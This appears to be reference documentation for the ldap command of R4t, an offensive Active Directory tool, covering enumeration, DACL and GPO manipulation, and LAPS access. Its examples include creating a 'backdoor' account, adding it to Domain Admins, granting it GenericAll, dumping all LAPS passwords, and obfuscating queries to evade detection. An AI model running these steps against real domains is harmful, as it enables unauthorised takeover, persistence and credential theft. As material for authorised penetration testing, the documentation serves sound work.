Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
ldap
The ldap command is R4t’s primary interface for interacting with Active Directory via the Lightweight Directory Access Protocol. It supports enumeration, modification, object creation and deletion, vulnerability scanning, DACL manipulation, GPO management, and LAPS interaction.
All ldap subcommands use the global authentication and connection flags.
Usage
r4t ldap <subcommand> [flags]
Subcommands
ldap get
Query and retrieve AD objects.
r4t ldap get <object-type> [flags]
Object Types
| Type | Description |
|---|
user | Single user by samAccountName, DN, or UPN |
users | All domain user accounts |
computer | Single computer account |
computers | All computer accounts |
group | Single group by name or DN |
groups | All security and distribution groups |
ou | Single Organizational Unit |
ous | All Organizational Units |
maq | Machine Account Quota for the domain |
spn | All accounts with Service Principal Names |
desc | Accounts with interesting strings in the description field |
Common Flags
| Flag | Description |
|---|
--name | Filter by samAccountName, CN, or DN |
--output, -o | Write results to file |
--raw | Output raw LDAP attributes |
Examples
# List all users
r4t ldap get users
# Get a single user
r4t ldap get user --name jsmith
# List all computers
r4t ldap get computers
# Find accounts with SPNs (Kerberoastable)
r4t ldap get spn
# Find accounts with interesting description strings
r4t ldap get desc
ldap create
Create new AD objects.
r4t ldap create <object-type> [flags]
Object Types
| Type | Description |
|---|
user | Create a new user account |
computer | Create a new computer account |
group | Create a new security group |
group-member | Add a member to an existing group |
ou | Create a new Organizational Unit |
Examples
# Create a user
r4t ldap create user --name backdoor --password 'P@ssword1' --ou "CN=Users,DC=corp,DC=example,DC=com"
# Create a computer account
r4t ldap create computer --name FAKEPC
# Add user to group
r4t ldap create group-member --group "Domain Admins" --member "CN=backdoor,CN=Users,DC=corp,DC=example,DC=com"
# Create an OU
r4t ldap create ou --name "Staging" --parent "DC=corp,DC=example,DC=com"
ldap delete
Delete AD objects.
r4t ldap delete <object-type> [flags]
Object Types
| Type | Description |
|---|
user | Delete a user account |
computer | Delete a computer account |
group-member | Remove a member from a group |
ou | Delete an Organizational Unit |
ldap modify
Modify attributes on an existing AD object.
| Flag | Description |
|---|
--dn | Distinguished Name of the object to modify |
--attribute | LDAP attribute name to change |
--value | New value for the attribute |
--add | Add the attribute value (rather than replace) |
--delete | Delete the attribute value |
Examples
# Set an arbitrary attribute
r4t ldap modify --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com" --attribute description --value "Test account"
# Add an SPN
r4t ldap modify --dn "CN=svcApp,CN=Users,DC=corp,DC=example,DC=com" --attribute servicePrincipalName --value "HTTP/app.corp.example.com" --add
ldap enable
Re-enable a disabled AD object.
r4t ldap enable <object-type> [flags]
Object Types
| Type | Description |
|---|
user | Enable a disabled user account |
computer | Enable a disabled computer account |
ldap password
Reset or change an account password.
r4t ldap password [flags]
| Flag | Description |
|---|
--target-user | The user whose password to change |
--new-password | The new password to set |
--old-password | Current password (required for self-service change) |
Examples
# Force reset (requires write permission on the target account)
r4t ldap password --target-user jsmith --new-password 'NewP@ss!'
# Self-service change (requires old password)
r4t ldap password --target-user jsmith --old-password 'OldP@ss' --new-password 'NewP@ss!'
ldap query
Execute a raw LDAP search query.
| Flag | Description |
|---|
--filter | LDAP search filter (e.g., (objectClass=user)) |
--attributes | Comma-separated list of attributes to return |
--base | Search base DN (defaults to domain root) |
--scope | Search scope: base, one, sub (default: sub) |
--output, -o | Write results to file |
Examples
# Find all enabled users with passwords that never expire
r4t ldap query --filter "(&(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=65536))"
# Get specific attributes for all computers
r4t ldap query --filter "(objectClass=computer)" --attributes "name,operatingSystem,dnshostname,lastlogontimestamp"
# Search within a specific OU
r4t ldap query --filter "(objectClass=user)" --base "OU=Employees,DC=corp,DC=example,DC=com"
ldap scan
Scan for AD vulnerabilities and misconfigurations.
This subcommand performs a broad vulnerability scan of the AD environment and populates the database with findings. It checks for:
- Accounts with no pre-authentication (AS-REP Roastable)
- Accounts with kerberoastable SPNs
- DCSync-capable accounts (Replicating Directory Changes All)
- Accounts with shadow credential opportunities
- Coercible hosts
- Password policy weaknesses
- Domain functional level issues
- Delegation misconfigurations (unconstrained, constrained, resource-based)
- Pre-Windows 2000 compatible access
- NOPAC-vulnerable accounts
| Flag | Description |
|---|
--output, -o | Write scan results to file |
ldap recon
Full domain reconnaissance — enumerates users, computers, groups, OUs, GPOs, trusts, domain controllers, and password policies, storing everything in the database.
| Flag | Description |
|---|
--output, -o | Output directory for results |
ldap dacl
Enumerate and modify Discretionary Access Control Lists (DACLs) on AD objects.
r4t ldap dacl <subcommand> [flags]
Subcommands
| Subcommand | Description |
|---|
get | Enumerate DACL ACEs on an object |
add | Add an ACE to an object’s DACL |
remove | Remove an ACE from an object’s DACL |
| Flag | Description |
|---|
--dn | Target object DN |
--trustee | Account to grant/revoke rights to |
--right | AD right (e.g., GenericAll, WriteProperty, ResetPassword) |
Examples
# View ACL on an object
r4t ldap dacl get --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com"
# Grant GenericAll to a controlled account
r4t ldap dacl add --dn "CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com" \
--trustee "CN=backdoor,CN=Users,DC=corp,DC=example,DC=com" --right GenericAll
ldap gplink
Manage Group Policy Object links to containers (OUs, domains, sites).
r4t ldap gplink <subcommand> [flags]
Subcommands
| Subcommand | Description |
|---|
add | Link a GPO to a container |
remove | Unlink a GPO from a container |
list | List all GPO links |
ldap laps
Interact with LAPS (Local Administrator Password Solution).
| Flag | Description |
|---|
--computer | Target computer name |
--all | Retrieve LAPS passwords for all computers |
--output, -o | Write results to file |
ms-Mcs-AdmPwd (LAPS v1) and msLAPS-Password (LAPS v2) attributes from computer objects.
Examples
# Get LAPS password for a specific computer
r4t ldap laps --computer WS01
# Dump LAPS passwords for all computers you can read
r4t ldap laps --all
ldap gpo
Enumerate Group Policy Objects.
| Flag | Description |
|---|
--output, -o | Write results to file |
--links | Include GPO link information |
ldap gpo — GPO Enumeration Notes
GPO data is stored in the gpos and gp_link_entries tables in the SQLite database after enumeration.
LDAP Obfuscation
R4t uses the el-dap library, which supports LDAP query obfuscation to evade signature-based detection of LDAP queries. Obfuscation is applied transparently for all ldap subcommand operations when configured.
